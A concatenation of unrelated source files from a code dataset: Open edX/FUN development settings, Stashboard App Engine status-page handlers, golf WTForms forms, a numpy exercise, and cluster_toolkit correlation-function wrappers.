default=PROFILE_IMAGE_BACKEND) PROFILE_IMAGE_SECRET_KEY = config( "PROFILE_IMAGE_SECRET_KEY", default=PROFILE_IMAGE_SECRET_KEY ) PROFILE_IMAGE_MAX_BYTES = config( "PROFILE_IMAGE_MAX_BYTES", default=PROFILE_IMAGE_MAX_BYTES, formatter=int ) PROFILE_IMAGE_MIN_BYTES = config( "PROFILE_IMAGE_MIN_BYTES", default=PROFILE_IMAGE_MIN_BYTES, formatter=int ) PROFILE_IMAGE_DEFAULT_FILENAME = "images/profiles/default" # EdxNotes config EDXNOTES_PUBLIC_API = config("EDXNOTES_PUBLIC_API", default=EDXNOTES_PUBLIC_API) EDXNOTES_INTERNAL_API = config("EDXNOTES_INTERNAL_API", default=EDXNOTES_INTERNAL_API) ##### Credit Provider Integration ##### CREDIT_PROVIDER_SECRET_KEYS = config( "CREDIT_PROVIDER_SECRET_KEYS", default={}, formatter=json.loads ) ##################### LTI Provider ##################### if FEATURES.get("ENABLE_LTI_PROVIDER"): INSTALLED_APPS += ("lti_provider",) LTI_USER_EMAIL_DOMAIN = config("LTI_USER_EMAIL_DOMAIN", default="lti.example.com") # For more info on this, see the notes in common.py LTI_AGGREGATE_SCORE_PASSBACK_DELAY = config( "LTI_AGGREGATE_SCORE_PASSBACK_DELAY", default=LTI_AGGREGATE_SCORE_PASSBACK_DELAY ) ##################### Credit Provider help link #################### CREDIT_HELP_LINK_URL = config("CREDIT_HELP_LINK_URL", default=CREDIT_HELP_LINK_URL) #### JWT configuration #### JWT_ISSUER = config("JWT_ISSUER", default=JWT_ISSUER) JWT_EXPIRATION = config("JWT_EXPIRATION", default=JWT_EXPIRATION) ################# PROCTORING CONFIGURATION ################## PROCTORING_BACKEND_PROVIDER = config( "PROCTORING_BACKEND_PROVIDER", default=PROCTORING_BACKEND_PROVIDER ) PROCTORING_SETTINGS = config( "PROCTORING_SETTINGS", default=PROCTORING_SETTINGS, formatter=json.loads ) ################# MICROSITE #################### MICROSITE_CONFIGURATION = config( "MICROSITE_CONFIGURATION", default={}, formatter=json.loads ) MICROSITE_ROOT_DIR = path(config("MICROSITE_ROOT_DIR", default="")) # Cutoff date for granting audit certificates if 
config("AUDIT_CERT_CUTOFF_DATE", default=None): AUDIT_CERT_CUTOFF_DATE = dateutil.parser.parse( config("AUDIT_CERT_CUTOFF_DATE", default=AUDIT_CERT_CUTOFF_DATE) ) ################ CONFIGURABLE LTI CONSUMER ############### # Add just the standard LTI consumer by default, forcing it to open in a new window and ask # the user before sending email and username: LTI_XBLOCK_CONFIGURATIONS = config( "LTI_XBLOCK_CONFIGURATIONS", default=[ { "display_name": "LTI consumer", "pattern": ".*", "hidden_fields": [ "ask_to_send_email", "ask_to_send_username", "new_window", ], "defaults": { "ask_to_send_email": True, "ask_to_send_username": True, "launch_target": "new_window", }, } ], formatter=json.loads, ) LTI_XBLOCK_SECRETS = config("LTI_XBLOCK_SECRETS", default={}, formatter=json.loads) ################################ FUN stuff ################################ SITE_VARIANT = "lms" # Environment's name displayed in FUN's backoffice ENVIRONMENT = config("ENVIRONMENT", default="no set") BASE_ROOT = path("/edx/app/edxapp/") # Fun-apps configuration INSTALLED_APPS += ( "backoffice", "bootstrapform", "ckeditor", "course_dashboard", "course_pages", "courses_api", "courses", "easy_thumbnails", "edx_gea", "forum_contributors", "fun_api", "fun_certificates", "fun_instructor", "fun", "funsite", "haystack", "masquerade", "newsfeed", "password_container", "payment_api", "payment", "pure_pagination", "raven.contrib.django.raven_compat", "rest_framework.authtoken", "teachers", "universities", "videoproviders", ) ROOT_URLCONF = "fun.lms.urls" # Related Richie platform url PLATFORM_RICHIE_URL = config("PLATFORM_RICHIE_URL", default=None) # Haystack configuration (default is minimal working configuration) HAYSTACK_CONNECTIONS = config( "HAYSTACK_CONNECTIONS", default={ "default": {"ENGINE": "courses.search_indexes.ConfigurableElasticSearchEngine"} }, formatter=json.loads, ) CKEDITOR_UPLOAD_PATH = "./" CKEDITOR_CONFIGS = { "default": { "toolbar": [ [ "Undo", "Redo", "-", "Bold", "Italic", 
"Underline", "-", "Link", "Unlink", "Anchor", "-", "Format", "-", "SpellChecker", "Scayt", "-", "Maximize", ], [ "HorizontalRule", "-", "Table", "-", "BulletedList", "NumberedList", "-", "Cut", "Copy", "Paste", "PasteText", "PasteFromWord", "-", "SpecialChar", "-", "Source", ], ], "toolbarCanCollapse": False, "entities": False, "width": 955, "uiColor": "#9AB8F3", }, "news": { # Redefine path where the news images/files are uploaded. This would # better be done at runtime with the 'reverse' function, but # unfortunately there is no way around defining this in the settings # file. "filebrowserUploadUrl": "/news/ckeditor/upload/", "filebrowserBrowseUrl": "/news/ckeditor/browse/", "toolbar_Full": [ [ "Styles", "Format", "Bold", "Italic", "Underline", "Strike", "SpellChecker", "Undo", "Redo", ], ["Image", "Flash", "Table", "HorizontalRule"], ["NumberedList", "BulletedList", "Blockquote", "TextColor", "BGColor"], ["Smiley", "SpecialChar"], ["Source"], ], }, } # ### FUN-APPS SETTINGS ### # This is dist-packages path where all fun-apps are FUN_BASE_ROOT = path(os.path.dirname(pkgutil.get_loader("funsite").filename)) SHARED_ROOT = DATA_DIR / "shared" # Add FUN applications templates directories to MAKO template finder before edX's ones MAKO_TEMPLATES["main"] = [ # overrides template in edx-platform/lms/templates FUN_BASE_ROOT / "funsite/templates/lms", FUN_BASE_ROOT / "funsite/templates", FUN_BASE_ROOT / "course_pages/templates", FUN_BASE_ROOT / "payment/templates", FUN_BASE_ROOT / "course_dashboard/templates", FUN_BASE_ROOT / "newsfeed/templates", FUN_BASE_ROOT / "fun_certificates/templates", ] + MAKO_TEMPLATES["main"] # JS static override DEFAULT_TEMPLATE_ENGINE["DIRS"].append(FUN_BASE_ROOT / "funsite/templates/lms") FUN_SMALL_LOGO_RELATIVE_PATH = "funsite/images/logos/funmooc173.png" FUN_BIG_LOGO_RELATIVE_PATH = "funsite/images/logos/funmoocfp.png" FAVICON_PATH = "fun/images/favicon.ico" # Locale paths # Here we rewrite LOCAL_PATHS to give precedence to our applications 
above edx-platform's ones, # then we add xblocks which provide translations as there is no native mechanism to handle this # See Xblock i18n: http://www.libremente.eu/2017/12/06/edx-translation/ LOCALIZED_FUN_APPS = [ "backoffice", "course_dashboard", "course_pages", "courses", "fun_api", "fun_certificates", "funsite", "newsfeed", "payment", "universities", "videoproviders", ] LOCALE_PATHS = [FUN_BASE_ROOT / app / "locale" for app in LOCALIZED_FUN_APPS] LOCALE_PATHS.append(REPO_ROOT / "conf/locale") # edx-platform locales LOCALE_PATHS.append(path(pkgutil.get_loader("proctor_exam").filename) / "locale") # -- Certificates CERTIFICATES_DIRECTORY_NAME = "attestations" FUN_LOGO_PATH = FUN_BASE_ROOT / "funsite/static" / FUN_BIG_LOGO_RELATIVE_PATH FUN_ATTESTATION_LOGO_PATH = ( FUN_BASE_ROOT / "funsite/static" / "funsite/images/logos/funmoocattest.png" ) STUDENT_NAME_FOR_TEST_CERTIFICATE = "Test User" # Videofront subtitles cache CACHES["video_subtitles"] = { "BACKEND": "django.core.cache.backends.filebased.FileBasedCache", "KEY_PREFIX": "video_subtitles", "LOCATION": DATA_DIR / "video_subtitles_cache", } # Course image thumbnails FUN_THUMBNAIL_OPTIONS = { "small": {"size": (270, 152), "crop": "smart"}, "big": {"size": (337, 191), "crop": "smart"}, "about": {"size": (730, 412), "crop": "scale"}, "facebook": { "size": (600, 315), "crop": "smart", }, # https://developers.facebook.com/docs/sharing/best-practices } THUMBNAIL_PRESERVE_EXTENSIONS = True THUMBNAIL_EXTENSION = "png" ##### ORA2 ###### ORA2_FILEUPLOAD_BACKEND = "swift" ORA2_SWIFT_KEY = config("ORA2_SWIFT_KEY", default="") ORA2_SWIFT_URL = config("ORA2_SWIFT_URL", default="") # Prefix for uploads of example-based assessment AI classifiers # This can be used to separate uploads for different environments ORA2_FILE_PREFIX = config("ORA2_FILE_PREFIX", default=ORA2_FILE_PREFIX) # Profile image upload PROFILE_IMAGE_BACKEND = { "class": "storages.backends.overwrite.OverwriteStorage", "options": { "location": 
os.path.join(MEDIA_ROOT, "profile-images/"), "base_url": os.path.join(MEDIA_URL, "profile-images/"), }, } ENABLE_ADWAYS_FOR_COURSES = config( "ENABLE_ADWAYS_FOR_COURSES", default=[], formatter=json.loads ) # Add our v3 CSS and JS files to assets compilation pipeline to make them available in courseware. # On FUN v3 frontend, which do not use edX's templates, those files are loaded # by funsite/templates/funsite/parts/base.html and css/lms-main.css PIPELINE_CSS["style-vendor"]["source_filenames"].append("fun/css/cookie-banner.css") PIPELINE_CSS["style-vendor"]["source_filenames"].append("funsite/css/header.css") PIPELINE_CSS["style-vendor"]["source_filenames"].append("funsite/css/footer.css") # can't find any common group for group in ["base_vendor", "main_vendor"]: PIPELINE_JS[group]["source_filenames"].append("funsite/js/header.js") PIPELINE_JS[group]["source_filenames"].append("fun/js/cookie-banner.js") # Glowbl GLOWBL_LTI_ENDPOINT = config( "GLOWBL_LTI_ENDPOINT", default="http://ltiapps.net/test/tp.php" ) GLOWBL_LTI_KEY = config("GLOWBL_LTI_KEY", default="jisc.ac.uk") GLOWBL_LTI_SECRET = config("GLOWBL_LTI_SECRET", default="secret") GLOWBL_LTI_ID = config("GLOWBL_LTI_ID", default="testtoolconsumer") GLOWBL_LAUNCH_URL = config( "GLOWBL_LAUNCH_URL", default="http://ltiapps.net/test/tp.php" ) GLOWBL_COLL_OPT = config("GLOWBL_COLL_OPT", default="FunMoocJdR") DEFAULT_TEMPLATE_ENGINE["DIRS"].append(FUN_BASE_ROOT / "funsite/templates/lms") DEFAULT_TEMPLATE_ENGINE["OPTIONS"]["context_processors"].append( "fun.context_processor.fun_settings" ) TEMPLATES = [DEFAULT_TEMPLATE_ENGINE] # This force Edx Studio to use our own video provider Xblock on default button FUN_DEFAULT_VIDEO_PLAYER = "libcast_xblock" MIDDLEWARE_CLASSES += ( "fun.middleware.LegalAcceptance", "backoffice.middleware.PathLimitedMasqueradeMiddleware", ) class LazyChoicesSorter(object): def __init__(self, choices): self.choices = choices def __iter__(self): for choice in sorted(self.choices, key=lambda peer: 
peer[1]): yield choice # These are the allowed subtitle languages, we have the same list on Videofront server # We remove 2 deprecated chinese language codes which do not exist on Django 1.10 VideoFront SUBTITLE_SUPPORTED_LANGUAGES = LazyChoicesSorter( (code, ugettext_lazy(lang)) for code, lang in global_settings.LANGUAGES if code not in ("zh-cn", "zh-tw") ) ANONYMIZATION_KEY = config("ANONYMIZATION_KEY", default="") RAVEN_CONFIG = config("RAVEN_CONFIG", default={"dsn": ""}, formatter=json.loads) ELASTICSEARCH_INDEX_SETTINGS = { "settings": { "analysis": { "filter": { "elision": { "type": "elision", "articles": ["l", "m", "t", "qu", "n", "s", "j", "d"], } }, "analyzer": { "custom_french_analyzer": { "tokenizer": "letter", "filter": [ "asciifolding", "lowercase", "french_stem", "elision", "stop", "word_delimiter", ], } }, } } } FUN_MKTG_URLS = config("FUN_MKTG_URLS", default={}, formatter=json.loads) # Default visibility of student's profile to other students ACCOUNT_VISIBILITY_CONFIGURATION["default_visibility"] = "private" # A user is verified if he has an approved SoftwareSecurePhotoVerification entry # this setting will create a dummy SoftwareSecurePhotoVerification for user in # paybox success callback view. A this point, we think it's better to create a # dummy one than to remove verifying process in edX FUN_ECOMMERCE_DEBUG_NO_NOTIFICATION = config( "FUN_ECOMMERCE_DEBUG_NO_NOTIFICATION", default=False, formatter=bool ) ECOMMERCE_NOTIFICATION_URL = config("ECOMMERCE_NOTIFICATION_URL", default=None) PAYMENT_ADMIN = "<EMAIL>" # List of pattern definitions to automatically add verified users to a cohort # If value is [] this feature is disabled # Otherwise this setting is a list of # tuple values (r"<course id regex>", "<cohort name>"). 
# e.g: if you want to enable this feature for a particular course you can set # this setting to # [ # (r"<course id>", "cohort name"), # ] VERIFIED_COHORTS = config("VERIFIED_COHORTS", default=[]) # Force Edx to use `libcast_xblock` as default video player # in the studio (big green button) and if any xblock is called `video` XBLOCK_SELECT_FUNCTION = prefer_fun_video if "sentry" in LOGGING.get("handlers"): LOGGING["handlers"]["sentry"]["environment"] = "development" # Configure gelf handler to listen on graylog server LOGGING["loggers"][""]["handlers"].append("gelf") LOGGING["loggers"]["tracking"]["handlers"].append("gelf") LOGGING["handlers"]["gelf"] = { "level": "DEBUG", "class": "djehouty.libgelf.handlers.GELFTCPSocketHandler", "host": "graylog", "port": 12201, "null_character": True, } DEBUG = True REQUIRE_DEBUG = True EMAIL_BACKEND = config( "EMAIL_BACKEND", default="django.core.mail.backends.console.EmailBackend" ) PIPELINE_ENABLED = False STATICFILES_STORAGE = "openedx.core.storage.DevelopmentStorage" ALLOWED_HOSTS = ["*"] FEATURES["AUTOMATIC_AUTH_FOR_TESTING"] = True # ORA2 fileupload ORA2_FILEUPLOAD_BACKEND = "filesystem" ORA2_FILEUPLOAD_ROOT = os.path.join(SHARED_ROOT, "openassessment_submissions") ORA2_FILEUPLOAD_CACHE_ROOT = os.path.join( SHARED_ROOT, "openassessment_submissions_cache" ) AUTHENTICATION_BACKENDS = config( "AUTHENTICATION_BACKENDS", default=["django.contrib.auth.backends.ModelBackend"], formatter=json.loads )
1.867188
2
stashboard/handlers/site.py
kelnos/stashboard
1
16742
# The MIT License # # Copyright (c) 2008 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to # deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. 
__author__ = '<NAME>' import datetime import calendar import logging import os import re import string import urllib import urlparse from google.appengine.api import memcache from google.appengine.api import users from google.appengine.ext import webapp from google.appengine.ext import db from datetime import date, timedelta from django.conf import settings from django.template.loader import render_to_string from django.utils import simplejson as json from time import mktime from models import List, Status, Service, Event, Profile import xml.etree.ElementTree as et from utils import authorized from wsgiref.handlers import format_date_time def default_template_data(): data = { "title": settings.SITE_NAME, "report_url": settings.REPORT_URL, "twitter_handle": settings.TWITTER_HANDLE, } user = users.get_current_user() if user is not None: data["user"] = user data["logout_url"] = users.create_logout_url("/") data["admin"] = users.is_current_user_admin() return data def get_past_days(num): date = datetime.date.today() dates = [] for i in range(1, num + 1): dates.append(date - datetime.timedelta(days=i)) return dates class BaseHandler(webapp.RequestHandler): def render(self, template_values, filename): self.response.out.write(render_to_string(filename, template_values)) def retrieve(self, key): """ Helper for loading data from memcache """ all_pages = memcache.get("__all_pages__") if all_pages is None: all_pages = {} item = memcache.get(key) if all_pages.has_key(key) else None if item is not None: return item else: item = self.data() if not memcache.set(key, item): logging.error("Memcache set failed on %s" % key) else: all_pages[key] = 1 if not memcache.set("__all_pages__", all_pages): logging.error("Memcache set failed on __all_pages__") return item def not_found(self): self.error(404) self.render(default_template_data(), "404.html") class NotFoundHandler(BaseHandler): def get(self): self.error(404) self.render(default_template_data(), "404.html") class 
UnauthorizedHandler(webapp.RequestHandler): def get(self): self.error(403) self.render(default_template_data(), "404.html") class RootHandler(BaseHandler): def data(self): services = [] default_status = Status.get_default() for service in Service.all().order("list").order("name").fetch(100): event = service.current_event() if event is not None: status = event.status else: status = default_status today = date.today() + timedelta(days=1) current, = service.history(1, default_status, start=today) has_issues = (current["information"] and status.key() == default_status.key()) service_dict = { "slug": service.slug, "name": service.name, "url": service.url(), "status": status, "has_issues": has_issues, "history": service.history(5, default_status), } services.append(service_dict) return { "days": get_past_days(5), "statuses": Status.all().fetch(100), "services": services, } def get(self): td = default_template_data() td.update(self.retrieve("frontpage")) #td.update(self.data()) self.render(td, 'index.html') class ListHandler(BaseHandler): list = None def data(self): services = [] default_status = Status.get_default() query = Service.all().filter("list =", self.list).order("name") for service in query.fetch(100): event = service.current_event() if event is not None: status = event.status else: status = default_status today = date.today() + timedelta(days=1) current, = service.history(1, default_status, start=today) has_issues = (current["information"] and status.key() == default_status.key()) service_dict = { "slug": service.slug, "name": service.name, "url": service.url(), "status": status, "has_issues": has_issues, "history": service.history(5, default_status), } services.append(service_dict) return { "days": get_past_days(5), "statuses": Status.all().fetch(100), "services": services, } def get(self, list_slug): self.list = List.get_by_slug(list_slug) if self.list is None: self.not_found() return td = default_template_data() td.update(self.retrieve("list"+list_slug)) 
#td.update(self.data()) self.render(td, 'index.html') class ListListHandler(BaseHandler): lists = [] statuses = [] def data(self): services = [] default_status = Status.get_default() lists = [] for list in self.lists: l = List.get_by_slug(list) if l is not None: lists.append(l) for service in Service.all().filter("list IN", lists).order("name").fetch(100): event = service.current_event() if event is not None: status = event.status else: status = default_status if len(self.statuses) and not status.slug in self.statuses: continue today = date.today() + timedelta(days=1) current, = service.history(1, default_status, start=today) has_issues = (current["information"] and status.key() == default_status.key()) service_dict = { "slug": service.slug, "name": service.name, "url": service.url(), "status": status, "has_issues": has_issues, "history": service.history(5, default_status), } services.append(service_dict) return { "days": get_past_days(5), "statuses": Status.all().fetch(100), "services": services, } def get(self): self.lists = self.request.get_all('filter') self.lists.sort() self.statuses = self.request.get_all('status') self.statuses.sort() td = default_template_data() td.update(self.retrieve("list"+"_".join(self.statuses)+"_".join(self.lists))) #td.update(self.data()) self.render(td, 'index.html') class ListSummaryHandler(BaseHandler): def data(self): lists = {} default_status = Status.get_default() for service in Service.all().order("list").fetch(100): event = service.current_event() if event is not None: status = event.status else: status = default_status if service.list and not lists.has_key(service.list.slug) or \ lists[service.list.slug]["status"].name < status.name: lists[service.list.slug] = {"list": service.list, "status": status} return { "lists": lists.items() } def get(self): td = default_template_data() td.update(self.retrieve("summary")) #td.update(self.data()) self.render(td, 'summary.html') class ServiceHandler(BaseHandler): def get(self, 
service_slug, year=None, month=None, day=None): service = Service.get_by_slug(service_slug) if not service: self.not_found() return try: if day: start_date = date(int(year), int(month), int(day)) end_date = start_date + timedelta(days=1) elif month: start_date = date(int(year), int(month), 1) days = calendar.monthrange(start_date.year, start_date.month)[1] end_date = start_date + timedelta(days=days) elif year: start_date = date(int(year), 1, 1) end_date = start_date + timedelta(days=365) else: start_date = None end_date = None except ValueError: self.not_found(404) return events = service.events if start_date and end_date: events.filter('start >= ', start_date).filter('start <', end_date) td = default_template_data() td["service"] = service td["events"] = events.order("-start").fetch(500) self.render(td, 'service.html') class BaseDocumentationHandler(BaseHandler): def get(self): td = default_template_data() td["selected"] = "overview" self.render(td, 'publicdoc/index.html') class DocumentationHandler(BaseHandler): pages = [ "events", "services", "service-lists", "status-images", "statuses", "status-images", ] def get(self, page): td = default_template_data() if page not in self.pages: self.render({}, '404.html') return td["selected"] = page self.render(td, "publicdoc/%s.html" % page) class CredentialsRedirectHandler(BaseHandler): def get(self): self.redirect("/admin/credentials") class RSSHandler(BaseHandler): """ Feed of the last settings.RSS_NUM_EVENTS_TO_FETCH events """ def get(self): self.response.headers['Content-Type'] = "application/rss+xml; charset=utf-8" host = self.request.headers.get('host', 'nohost') base_url = self.request.scheme + "://" + host events = [] query = Event.all().order("-start") # Filter query by requested services, if specified in the 'service' URL parameter. 
service_list = [] for service_arg in self.request.get_all('services'): service_list.extend(service_arg.split(',')) service_list = map(lambda serv_slug: Service.get_by_slug(serv_slug), service_list) # filter out any non-existent services service_list = filter(lambda service: not service is None, service_list) service_string = 'all services' if len(service_list) > 0: query.filter('service IN', service_list) if len(service_list) == 1: service_string = 'the %s service' % service_list[0].name elif len(service_list) == 2: service_string = 'the %s and %s services' % (service_list[0].name, service_list[1].name) else: service_string = 'the %s, and %s services' % (', '.join([service.name for service in service_list[:-1]]), service_list[-1].name) # Create the root 'rss' element rss_xml = et.Element('rss') rss_xml.set('version', '2.0') # Create the channel element and its metadata elements channel = et.SubElement(rss_xml, 'channel') title = et.SubElement(channel, 'title') title.text = '%s Service Events' % settings.SITE_NAME description = et.SubElement(channel, 'description') description.text = 'This feed shows the last %d events on %s on %s.' % (settings.RSS_NUM_EVENTS_TO_FETCH, service_string, settings.SITE_NAME) link = et.SubElement(channel, 'link') link.text = base_url # Create each of the feed events. 
item_subelements = { 'title': lambda(event): '[%s - %s] %s' % (event.service.name, event.status.name, unicode(event.message)), 'description': lambda(event): '%s' % unicode(event.message), 'link': lambda(event): '%s/services/%s' % (base_url, event.service.slug), 'category': lambda(event): event.service.name, 'pubDate': lambda(event): format_date_time(mktime(event.start.timetuple())), 'guid': lambda(event): '%s/api/v1/services/%s/events/%s' % (base_url, event.service.slug, unicode(event.key())) } for event in query.fetch(settings.RSS_NUM_EVENTS_TO_FETCH): item = et.SubElement(channel, 'item') for tag, text_func in item_subelements.iteritems(): subelement = et.SubElement(item, tag) subelement.text = text_func(event) self.response.out.write('<?xml version="1.0" encoding="UTF-8"?>\n') self.response.out.write(et.tostring(rss_xml))
1.671875
2
bga/forms.py
KarmaPoliceT2/bga
0
16743
<reponame>KarmaPoliceT2/bga<gh_stars>0 from wtforms import Form, StringField, PasswordField, DecimalField, IntegerField, SelectField, validators from wtforms.fields.html5 import DateField def strip_filter(x): return x.strip() if x else None class RegistrationForm(Form): username = StringField('Username', [validators.Length( min=1, max=255)], filters=[strip_filter]) password = PasswordField('Password', [validators.Length(min=3, max=255)]) class CreateCourseForm(Form): coursename = StringField( 'Course Name', [validators.Length(min=1, max=255)], filters=[strip_filter]) courselocation = StringField( 'Course Location', [validators.Length(min=1, max=255)], filters=[strip_filter]) rating = DecimalField('Rating', [validators.NumberRange( min=50, max=150, message="Must Be Between 50-150")], places=2) slope = IntegerField('Slope', [validators.NumberRange( min=55, max=155, message="Must Be Between 55-155")]) courseimage = StringField('Course Image URL', [validators.Length( min=1, max=255), validators.URL(message="Must Be a URL")], filters=[strip_filter]) class CreateScoreForm(Form): course = SelectField('Course Name', choices=[('oops', 'oops')]) rounddate = DateField('Round Date', format='%Y-%m-%d') score = IntegerField('Round Score') attest = SelectField('Attesting Golfer', choices=[('oops', 'oops')])
2.359375
2
ejercicios_python/Clase05/practica5-9.py
hcgalvan/UNSAM-Python-programming
0
16744
# -*- coding: utf-8 -*- """ Created on Wed Sep 15 08:32:03 2021 @author: User """ import numpy as np import matplotlib.pyplot as plt a = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]) print(a) print(a[0]) print(a.ndim) #te dice la cantidad de ejes (o dimensiones) del arreglo print(a.shape) #Te va a dar una tupla de enteros que indican la cantidad de elementos en cada eje. print(a.size) #%% vec_fila = a[np.newaxis, :] print(vec_fila.shape, a.shape) #%% print(a.sum()) print(a.min()) print(a.max()) #%% print(a) print(a.max(axis=1)) print(a.max(axis=0)) #%% print(np.random.random(3))
3.375
3
cluster_toolkit/xi.py
jhod0/cluster_toolkit
0
16745
<filename>cluster_toolkit/xi.py """Correlation functions for matter and halos. """ import cluster_toolkit from cluster_toolkit import _ArrayWrapper, _handle_gsl_error import numpy as np def xi_nfw_at_r(r, M, c, Omega_m, delta=200): """NFW halo profile correlation function. Args: r (float or array like): 3d distances from halo center in Mpc/h comoving M (float): Mass in Msun/h c (float): Concentration Omega_m (float): Omega_matter, matter fraction of the density delta (int; optional): Overdensity, default is 200 Returns: float or array like: NFW halo profile. """ r = _ArrayWrapper(r, 'r') xi = _ArrayWrapper.zeros_like(r) cluster_toolkit._lib.calc_xi_nfw(r.cast(), len(r), M, c, delta, Omega_m, xi.cast()) return xi.finish() def xi_einasto_at_r(r, M, conc, alpha, om, delta=200, rhos=-1.): """Einasto halo profile. Args: r (float or array like): 3d distances from halo center in Mpc/h comoving M (float): Mass in Msun/h; not used if rhos is specified conc (float): Concentration alpha (float): Profile exponent om (float): Omega_matter, matter fraction of the density delta (int): Overdensity, default is 200 rhos (float): Scale density in Msun h^2/Mpc^3 comoving; optional Returns: float or array like: Einasto halo profile. """ r = _ArrayWrapper(r, 'r') xi = _ArrayWrapper.zeros_like(r) cluster_toolkit._lib.calc_xi_einasto(r.cast(), len(r), M, rhos, conc, alpha, delta, om, xi.cast()) return xi.finish() def xi_mm_at_r(r, k, P, N=500, step=0.005, exact=False): """Matter-matter correlation function. 
Args: r (float or array like): 3d distances from halo center in Mpc/h comoving k (array like): Wavenumbers of power spectrum in h/Mpc comoving P (array like): Matter power spectrum in (Mpc/h)^3 comoving N (int; optional): Quadrature step count, default is 500 step (float; optional): Quadrature step size, default is 5e-3 exact (boolean): Use the slow, exact calculation; default is False Returns: float or array like: Matter-matter correlation function """ r = _ArrayWrapper(r, 'r') k = _ArrayWrapper(k, allow_multidim=True) P = _ArrayWrapper(P, allow_multidim=True) xi = _ArrayWrapper.zeros_like(r) if not exact: rc = cluster_toolkit._lib.calc_xi_mm(r.cast(), len(r), k.cast(), P.cast(), len(k), xi.cast(), N, step) _handle_gsl_error(rc, xi_mm_at_r) else: if r.arr.max() > 1e3: raise Exception("max(r) cannot be >1e3 for numerical stability.") rc = cluster_toolkit._lib.calc_xi_mm_exact(r.cast(), len(r), k.cast(), P.cast(), len(k), xi.cast()) _handle_gsl_error(rc, xi_mm_at_r) return xi.finish() def xi_2halo(bias, xi_mm): """2-halo term in halo-matter correlation function Args: bias (float): Halo bias xi_mm (float or array like): Matter-matter correlation function Returns: float or array like: 2-halo term in halo-matter correlation function """ xi_mm = _ArrayWrapper(xi_mm, allow_multidim=True) xi = _ArrayWrapper.zeros_like(xi_mm) cluster_toolkit._lib.calc_xi_2halo(len(xi_mm), bias, xi_mm.cast(), xi.cast()) return xi.finish() def xi_hm(xi_1halo, xi_2halo, combination="max"): """Halo-matter correlation function Note: at the moment you can combine the 1-halo and 2-halo terms by either taking the max of the two or the sum of the two. The 'combination' field must be set to either 'max' (default) or 'sum'. 
Args: xi_1halo (float or array like): 1-halo term xi_2halo (float or array like, same size as xi_1halo): 2-halo term combination (string; optional): specifies how the 1-halo and 2-halo terms are combined, default is 'max' which takes the max of the two Returns: float or array like: Halo-matter correlation function """ if combination == "max": switch = 0 elif combination == 'sum': switch = 1 else: raise Exception("Combinations other than maximum not implemented yet") xi_1halo = _ArrayWrapper(xi_1halo, allow_multidim=True) xi_2halo = _ArrayWrapper(xi_2halo, allow_multidim=True) xi = _ArrayWrapper.zeros_like(xi_1halo) cluster_toolkit._lib.calc_xi_hm(len(xi_1halo), xi_1halo.cast(), xi_2halo.cast(), xi.cast(), switch) return xi.finish() def xi_DK(r, M, conc, be, se, k, P, om, delta=200, rhos=-1., alpha=-1., beta=-1., gamma=-1.): """Diemer-Kravtsov 2014 profile. Args: r (float or array like): radii in Mpc/h comoving M (float): mass in Msun/h conc (float): Einasto concentration be (float): DK transition parameter se (float): DK transition parameter k (array like): wavenumbers in h/Mpc P (array like): matter power spectrum in [Mpc/h]^3 Omega_m (float): matter density fraction delta (float): overdensity of matter. Optional, default is 200 rhos (float): Einasto density. Optional, default is compute from the mass alpha (float): Einasto parameter. Optional, default is computed from peak height beta (float): DK 2-halo parameter. Optional, default is 4 gamma (float): DK 2-halo parameter. 
Optional, default is 8 Returns: float or array like: DK profile evaluated at the input radii """ r = _ArrayWrapper(r, 'r') k = _ArrayWrapper(k, allow_multidim=True) P = _ArrayWrapper(P, allow_multidim=True) xi = _ArrayWrapper.zeros_like(r) cluster_toolkit._lib.calc_xi_DK(r.cast(), len(r), M, rhos, conc, be, se, alpha, beta, gamma, delta, k.cast(), P.cast(), len(k), om, xi.cast()) return xi.finish() def xi_DK_appendix1(r, M, conc, be, se, k, P, om, bias, xi_mm, delta=200, rhos=-1., alpha=-1., beta=-1., gamma=-1.): """Diemer-Kravtsov 2014 profile, first form from the appendix, eq. A3. Args: r (float or array like): radii in Mpc/h comoving M (float): mass in Msun/h conc (float): Einasto concentration be (float): DK transition parameter se (float): DK transition parameter k (array like): wavenumbers in h/Mpc P (array like): matter power spectrum in [Mpc/h]^3 Omega_m (float): matter density fraction bias (float): halo bias xi_mm (float or array like): matter correlation function at r delta (float): overdensity of matter. Optional, default is 200 rhos (float): Einasto density. Optional, default is compute from the mass alpha (float): Einasto parameter. Optional, default is computed from peak height beta (float): DK 2-halo parameter. Optional, default is 4 gamma (float): DK 2-halo parameter. Optional, default is 8 Returns: float or array like: DK profile evaluated at the input radii """ r = _ArrayWrapper(r, 'r') k = _ArrayWrapper(k, allow_multidim=True) P = _ArrayWrapper(P, allow_multidim=True) xi_mm = _ArrayWrapper(xi_mm, allow_multidim=True) xi = np.zeros_like(r) cluster_toolkit._lib.calc_xi_DK_app1(r.cast(), len(r), M, rhos, conc, be, se, alpha, beta, gamma, delta, k.cast(), P.cast(), len(k), om, bias, xi_mm.cast(), xi.cast()) return xi.finish() def xi_DK_appendix2(r, M, conc, be, se, k, P, om, bias, xi_mm, delta=200, rhos=-1., alpha=-1., beta=-1., gamma=-1.): """Diemer-Kravtsov 2014 profile, second form from the appendix, eq. A4. 
